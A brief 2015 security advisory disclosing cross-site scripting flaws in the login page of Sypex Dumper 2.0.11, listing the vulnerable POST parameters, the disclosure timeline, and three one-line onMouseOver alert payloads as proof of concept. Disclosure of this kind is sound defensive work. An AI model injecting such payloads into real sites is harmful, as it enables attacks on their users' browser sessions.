Sypex Dumper version 2.0.11 suffers from multiple cross site scripting vulnerabilities.
a557a41cc14f0fa4371e88173d14cc9d2536437e1d9f3a70dba00fcae55b4b4b
Credits: John Page ( hyp3rlinx )
Domains: hyp3rlinx.altervista.org
Source:
http://hyp3rlinx.altervista.org/advisories/AS-SYPEX0529.txt
Vendor:
https://sypex.net
Product:
Sypex Dumper 2.0.11 is a PHP web based MySQL database management system.
Advisory Information:
================================================
Sypex Dumper 2.0.11 XSS Vulnerabilities
XSS
Vulnerability Details:
=====================
Login page input fields are vulnerable to XSS via POST method.
Allowing remote attackers to execute arbitrary code in the
context of an user's browser session.
Exploit code(s):
===============
host="onMouseOver="alert(666);
pass="onMouseOver="alert(666);
user="onMouseOver="alert(666);
Disclosure Timeline:
=========================================================
Vendor Notification: May 27, 2015
May 29, 2015: Public Disclosure
Severity Level:
=========================================================
Med
Description:
==========================================================
Request Method(s):
[+] POST
Vulnerable Product:
[+] Sypex Dumper 2.0.11
Vulnerable Parameter(s):
[+] host, pass, user
Affected Area(s):
[+] Login page
===============================================================
(hyp3rlinx)